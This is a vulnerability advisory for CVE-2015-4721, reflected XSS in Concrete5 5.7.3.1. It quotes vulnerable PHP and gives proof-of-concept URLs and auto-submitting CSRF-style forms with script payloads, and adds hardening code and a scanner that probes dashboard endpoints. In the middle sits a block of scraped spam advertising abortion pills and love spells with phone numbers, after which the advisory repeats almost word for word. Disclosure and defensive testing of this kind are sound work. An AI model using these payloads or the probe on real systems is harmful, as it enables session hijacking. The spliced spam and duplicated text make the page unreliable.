Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted

Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1

Author: Egidio Romano
Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/4
Summary

Vulnerabilities Class   Cross Site Scripting (XSS)
CVE ID                  CVE-2015-4721
Remote                  Yes
Local                   No
Published               June 6, 2015
Updated                 June 24, 2015
Credit                  Egidio Romano
Vulnerable Version      5.7.3.1 and probably prior versions
Fixed On                5.7.4
Other References        https://hackerone.com/reports/59661
                        http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html
Description

Concrete5 is vulnerable to several reflected Cross Site Scripting (XSS) attacks because user-supplied request parameters are written into the HTML it generates without being validated or encoded. All of the affected pages are dashboard or panel views, so the victim is an authenticated user with dashboard access who is lured to a crafted URL or to a page that submits a form on their behalf.
Vulnerabilities Details

Following are the reflected XSS vulnerabilities identified:

- File: /concrete/views/panels/details/page/versions.php (lines 5-14):

    <?php foreach($_REQUEST['cvID'] as $cvID) {
        $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
        $checked = false;
    }
    print $ih->tabs($tabs);
    foreach($_REQUEST['cvID'] as $cvID) { ?>
        <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
            <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>">

User input passed through the "cvID" and "cID" request parameters is not properly sanitized before being used to generate HTML output. "cvID" is iterated as an array (hence the cvID[] syntax in the URLs below), and both values are written into double-quoted attribute values (the div id and the iframe src), so a payload only has to close the attribute and the tag it sits in. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting malicious URLs like these:

http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--

http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
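The remedy is the same for every entry in this advisory: encode at the point where a value enters markup, and for numeric identifiers also enforce the type. The following is an added example, not concrete5's code and not its 5.7.4 patch: the versions.php sink reduced to one function, next to a hardened rewrite. The names renderVersionTabsVulnerable(), renderVersionTabsFixed(), h() and containsRawScript() are this example's own, the $ih->tabs() call is left out, and REL_DIR_FILES_TOOLS_REQUIRED is given an assumed value so the file runs from the CLI.

```php
<?php
// Added example, not concrete5 code. Run with: php versions_example.php
declare(strict_types=1);

const REL_DIR_FILES_TOOLS_REQUIRED = '/index.php/tools/required'; // assumed value, not the real constant

// Vulnerable: request values are concatenated into attribute values and a URL exactly as received.
function renderVersionTabsVulnerable(array $request): string
{
    $out = '';
    foreach ($request['cvID'] as $cvID) {
        $out .= '<div id="ccm-tab-content-view-version-' . $cvID . '" style="display: none; height: 100%">'
              . '<iframe border="0" frameborder="0" height="100%" width="100%" src="'
              . REL_DIR_FILES_TOOLS_REQUIRED . '/pages/preview_version?cvID=' . $cvID
              . '&amp;cID=' . $request['cID'] . '"></iframe></div>';
    }
    return $out;
}

// Attribute-context encoder: ENT_QUOTES also escapes the single quote, so the result is safe
// inside both "..." and '...' attribute values; ENT_SUBSTITUTE keeps invalid UTF-8 from
// silently emptying the string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: cvID and cID are numeric database IDs, so cast them to int and drop anything that
// does not survive the cast; still encode at the point of output (defence in depth) and let
// http_build_query() URL-encode the query string.
function renderVersionTabsFixed(array $request): string
{
    $cID   = (int) ($request['cID'] ?? 0);
    $cvIDs = is_array($request['cvID'] ?? null) ? $request['cvID'] : [];
    $out   = '';
    foreach ($cvIDs as $raw) {
        $cvID = (int) $raw;          // '"><script>...' becomes 0
        if ($cvID <= 0) {
            continue;                // refuse to render garbage instead of echoing it
        }
        $src  = REL_DIR_FILES_TOOLS_REQUIRED . '/pages/preview_version?'
              . http_build_query(['cvID' => $cvID, 'cID' => $cID]);
        $out .= '<div id="' . h('ccm-tab-content-view-version-' . $cvID) . '" style="display: none; height: 100%">'
              . '<iframe border="0" frameborder="0" height="100%" width="100%" src="' . h($src) . '"></iframe></div>';
    }
    return $out;
}

// Does the rendered markup contain an unencoded <script> tag?
function containsRawScript(string $html): bool
{
    return stripos($html, '<script>') !== false;
}

// Self-check with the advisory's first payload for cvID[].
$payload = ['cID' => '1', 'cvID' => ['"><script>alert(/XSS/)</script><!--']];
printf("vulnerable: raw <script> present = %s\n", containsRawScript(renderVersionTabsVulnerable($payload)) ? 'yes' : 'no');
printf("fixed:      raw <script> present = %s\n", containsRawScript(renderVersionTabsFixed($payload)) ? 'yes' : 'no');
// A legitimate request still renders after the fix, with the query string attribute-encoded.
echo renderVersionTabsFixed(['cID' => '1', 'cvID' => ['42']]), "\n";
```

The first printed line reports the raw tag in the vulnerable output; the second reports none, because the payload is cast to 0 and skipped before any markup is built. The int cast is the part that only works because these parameters are IDs; for free-text parameters such as "filter" or "pageURL" below, h() at the output point is the whole fix (the same idea as concrete5's own h() helper around htmlspecialchars()).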
- File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

    public function selectUser($fieldName, $uID = false, $javascriptFunc …
        $selectedUID = 0;
        if (isset($_REQUEST[$fieldName])) {
            $selectedUID = $_REQUEST[$fieldName];
        } else if ($uID > 0) {
            $selectedUID = $uID;
        }
        $html = '';
        $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
        if ($selectedUID > 0) {
            $ui = UserInfo::getByID($selectedUID);
            $html .= $ui->getUserName();
        }
        $html .= '</strong></div>';
        $identifier = new \Concrete\Core\Utility\Service\Identifier();
        $selector = $identifier->getString(32);
        $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
        $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';

User input passed through the "uID" request parameter is not properly sanitized before being used to generate HTML output: selectUser() reads $_REQUEST[$fieldName], and the page attributes panel calls it with "uID" as the field name. The $selectedUID > 0 check does not help, since a non-numeric string fails the comparison (so UserInfo::getByID() is never reached) but is still concatenated unencoded into the value attribute of the hidden input. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
- File: /concrete/elements/group/search.php (lines 4-20):

    $searchRequest = $_REQUEST;
    $result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
    $tree = GroupTree::get();
    $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
    $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
    ?>
    <style type="text/css">
        div[data-search=groups] form.ccm-search-fields {
            margin-left: 0px !important;
        }
    </style>
    <div data-search="groups">
        <script type="text/template" data-template="search-form">
            <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
                <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />

User input passed through the "filter" request parameter is not properly sanitized before being used to generate HTML output: $searchRequest is a plain copy of $_REQUEST, and the value is echoed straight into the value attribute of a hidden input. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
- URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon

User input passed through the "msCountry" POST parameter is not properly sanitized before being used to generate HTML output. Because the parameter is read from a POST request, a plain link is not enough: the victim, while logged in to the dashboard, has to be tricked into visiting a malicious web page that submits the form automatically, like the one below. Note that the form carries no anti-CSRF token, so the attack also relies on the endpoint accepting a cross-site POST as-is.

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
- URL: http://[host]/index.php/dashboard/pages/single

User input passed through the "pageURL" POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user's browser by tricking the victim user into visiting a malicious web page like this (the same auto-submitting form delivery as above):

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
- File: /concrete/attributes/select/form.php (lines 55-60):

    $vals = $this->post('atSelectNewOption');
    if (is_array($vals)) {
        foreach($vals as $v) { ?>
            <div class="newAttrValue">
                <?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
                <span class="badge"><?php echo $v?></span>

User input passed through the "atSelectNewOption" POST parameter is not properly sanitized before being used to generate HTML output: each submitted value is echoed between the <span class="badge"> tags, i.e. directly in HTML text context, so no attribute break-out is needed. This can be exploited by an attacker to inject arbitrary script code into another user's browser; as with the other POST parameters above, delivery needs a page that submits the form on the victim's behalf rather than a plain link.
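To confirm whether an instance is affected, or that an upgrade to 5.7.4 closed all six points, a practitioner wants a repeatable check rather than alert() boxes. The following is an added example, not part of the advisory: probeTargets() builds each request the way the PoCs above do but with a random canary tag instead of a script, and isReflectedRaw() decides from a response body whether the canary came back unencoded. The function names, the CLI interface (base URL and session cookie as arguments) and the sample bodies are this example's own; the assumption for a live run is that the cookie belongs to a session with dashboard access, because every listed URL is a dashboard or panel view.

```php
<?php
// Added example, not part of the advisory.
// Live run:    php check.php https://host 'CONCRETE5=<session id>'   (assumed cookie name)
// Offline run: php check.php                                          (constructed sample bodies)
declare(strict_types=1);

function canary(): string
{
    return 'xss' . bin2hex(random_bytes(4)); // e.g. xss1a2b3c4d, unlikely to occur naturally
}

// Method, path and parameters for each injection point in the advisory. The payload closes the
// surrounding quoted attribute and its tag, then opens a tag named after the canary.
function probeTargets(string $c): array
{
    $p = '"><' . $c . '>';
    return [
        ['GET',  '/index.php/ccm/system/panels/details/page/versions',       ['cID' => '1', 'cvID' => [$p . '<!--']]],
        ['GET',  '/index.php/ccm/system/panels/details/page/versions',       ['cvID' => ['1'], 'cID' => $p]],
        ['GET',  '/index.php/ccm/system/panels/details/page/attributes',     ['cID' => '1', 'uID' => $p]],
        ['GET',  '/index.php/dashboard/users/groups',                        ['filter' => $p]],
        ['POST', '/index.php/dashboard/system/multilingual/setup/load_icon', ['msCountry' => $p . '<!--']],
        ['POST', '/index.php/dashboard/pages/single',                        ['pageURL' => $p]],
    ];
}

// A raw reflection contains the literal tag; a correctly encoded one contains &lt;canary&gt;.
function isReflectedRaw(string $body, string $c): bool
{
    return strpos($body, '<' . $c . '>') !== false;
}

// Minimal HTTP client on the stream wrapper; ignore_errors keeps the body on 4xx/5xx.
function fetch(string $method, string $url, array $params, string $cookie): string
{
    $opts = ['http' => ['method' => $method, 'ignore_errors' => true,
                        'header' => "Cookie: $cookie\r\n"]];
    if ($method === 'POST') {
        $opts['http']['header']  .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $opts['http']['content']  = http_build_query($params);
    } else {
        $url .= '?' . http_build_query($params);   // cvID[] becomes cvID%5B0%5D=..., which PHP reads the same way
    }
    return (string) file_get_contents($url, false, stream_context_create($opts));
}

function runChecks(string $base, string $cookie): array
{
    $c = canary();
    $results = [];
    foreach (probeTargets($c) as [$method, $path, $params]) {
        $body = fetch($method, $base . $path, $params, $cookie);
        $results[] = [$method, $path, isReflectedRaw($body, $c)];
    }
    return $results;
}

if ($argc >= 3) {
    foreach (runChecks(rtrim($argv[1], '/'), $argv[2]) as [$method, $path, $raw]) {
        printf("%-4s %-62s %s\n", $method, $path, $raw ? 'REFLECTED RAW' : 'ok');
    }
} else {
    // Constructed sample bodies: a hidden input as the vulnerable code emits it, and as an
    // htmlspecialchars()-encoded version would.
    $c = 'xsscafef00d';
    $vulnerableBody = '<input type="hidden" name="filter" value=""><' . $c . '>" />';
    $fixedBody      = '<input type="hidden" name="filter" value="&quot;&gt;&lt;' . $c . '&gt;" />';
    printf("vulnerable sample: %s\n", isReflectedRaw($vulnerableBody, $c) ? 'REFLECTED RAW' : 'ok');
    printf("fixed sample:      %s\n", isReflectedRaw($fixedBody, $c) ? 'REFLECTED RAW' : 'ok');
}
```

Read the results with two caveats. "REFLECTED RAW" is a definite output-encoding failure on that parameter; "ok" only means something when the response is the real page, so if the session is not valid the panel endpoints answer with a login page or redirect and every line reads "ok" for the wrong reason (check the HTTP status before trusting a clean run). The check also flags a raw tag that lands somewhere it would not execute, such as inside a textarea; that is still an encoding bug worth fixing, but it is not by itself proof of script execution.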

%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 

Concrete5 Multiple Reflected XSS Advisory

Edition: 1.0
Last Edit: 24/06/2015
Classification: Not restricted

Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1
Author: Egidio Romano

Multiple Reflected XSS in Concrete5 version 5.7.3.1
Edition: v1.0 Date: 24/06/2015
Not restricted Page 1/4

Summary

Vulnerabilities Class: Cross Site Scripting (XSS)
CVE ID: CVE-2015-4721
Remote: Yes
Local: No
Published: June 6, 2015
Updated: June 24, 2015
Credit: Egidio Romano
Vulnerable Version: 5.7.3.1 and probably prior versions
Fixed On: 5.7.4
Other References:
https://hackerone.com/reports/59661
http://blog.mindedsecurity.com/2015/06/multiple-security-issues-discovered-in-concrete5-part1.html

Description

Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.

Vulnerabilities Details

Following are the reflected XSS vulnerabilities identified:

File: /concrete/views/panels/details/page/versions.php (lines 5-14):

<?php foreach($_REQUEST['cvID'] as $cvID) {
    $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked);
    $checked = false;
}
print $ih->tabs($tabs);
foreach($_REQUEST['cvID'] as $cvID) { ?>
<div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%">
<iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" />

User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these:

http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E%3C!--
http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/iframe%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35):

public function selectUser($fieldName, $uID = false, $javascriptFunc …
    $selectedUID = 0;
    if (isset($_REQUEST[$fieldName])) {
        $selectedUID = $_REQUEST[$fieldName];
    } else if ($uID > 0) {
        $selectedUID = $uID;
    }
    $html = '';
    $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary-selected-item-inner"><strong class="ccm-summary-selected-item-label">';
    if ($selectedUID > 0) {
        $ui = UserInfo::getByID($selectedUID);
        $html .= $ui->getUserName();
    }
    $html .= '</strong></div>';
    $identifier = new \Concrete\Core\Utility\Service\Identifier();
    $selector = $identifier->getString(32);
    $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog-modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>';
    $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';

User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

File: /concrete/elements/group/search.php (lines 4-20):

$searchRequest = $_REQUEST;
$result = Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
$tree = GroupTree::get();
$guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
$registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
?>
<style type="text/css">
    div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; }
</style>
<div data-search="groups">
<script type="text/template" data-template="search-form">
<form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm-search-fields-none">
<input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" />

User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:

http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E

URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon

User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon">
<input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

URL: http://[host]/index.php/dashboard/pages/single

User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this:

<html>
<body>
<form method="POST" action="http://[host]/index.php/dashboard/pages/single">
<input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'>
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

File: /concrete/attributes/select/form.php (lines 55-60):

$vals = $this->post('atSelectNewOption');
if (is_array($vals)) {
    foreach($vals as $v) { ?>
<div class="newAttrValue">
    <?php echo $form->hidden($this->field('atSelectNewOption') . '[]', $v)?>
    <span class="badge"><?php echo $v?></span>

User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.
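As an added example, not code from Concrete5 or from this advisory, the following shows the two fixes the findings above call for: numeric ids such as cvID and cID are validated as positive integers before they reach the markup, and free-text values such as filter are entity-encoded before being placed in an attribute. It assumes a $toolsDir argument standing in for the REL_DIR_FILES_TOOLS_REQUIRED constant and leaves out the t() and $ih->tabs() helpers.

```php
<?php
// Added example, not Concrete5 code: hardened rendering for the parameters in
// this advisory. Ids are validated as positive integers; free-text values are
// HTML-encoded with ENT_QUOTES so they cannot close an attribute or a tag.

/** Return $value as a positive int, or null for anything else (arrays, "1abc", 0). */
function positive_int($value): ?int {
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

/** Encode for use inside double-quoted attributes and element text. */
function h($value): string {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Hardened versions.php: one preview frame per valid cvID, nothing for a bad cID.
 *  $toolsDir is an assumed argument standing in for REL_DIR_FILES_TOOLS_REQUIRED. */
function render_version_frames($cvIDs, $cID, string $toolsDir): string {
    $cID = positive_int($cID);
    if ($cID === null || !is_array($cvIDs)) {
        return '';
    }
    $out = '';
    foreach ($cvIDs as $cvID) {
        $cvID = positive_int($cvID);
        if ($cvID === null) {
            continue; // skip anything that is not a version id
        }
        $src = h($toolsDir) . '/pages/preview_version?cvID=' . $cvID . '&amp;cID=' . $cID;
        $out .= '<div id="ccm-tab-content-view-version-' . $cvID . '">'
              . '<iframe frameborder="0" src="' . $src . '"></iframe></div>' . "\n";
    }
    return $out;
}

/** Hardened search.php hidden input: the filter value is encoded, never echoed raw. */
function render_filter_input($filter): string {
    return '<input type="hidden" name="filter" value="' . h($filter) . '" />';
}
// Constructed sample request shaped like the advisory's payloads.
$request = [
    'cID'    => '1"></iframe><script>alert(/XSS/)</script>',
    'cvID'   => ['1', '"><script>alert(/XSS/)</script><!--', '2'],
    'filter' => '"><script>alert(/XSS/)</script>',
];
echo render_version_frames($request['cvID'], '1', '/tools/required');             // non-numeric cvID entry is dropped
echo render_version_frames($request['cvID'], $request['cID'], '/tools/required'); // non-numeric cID: nothing rendered
echo render_filter_input($request['filter']), "\n";                               // quotes and angle brackets encoded
```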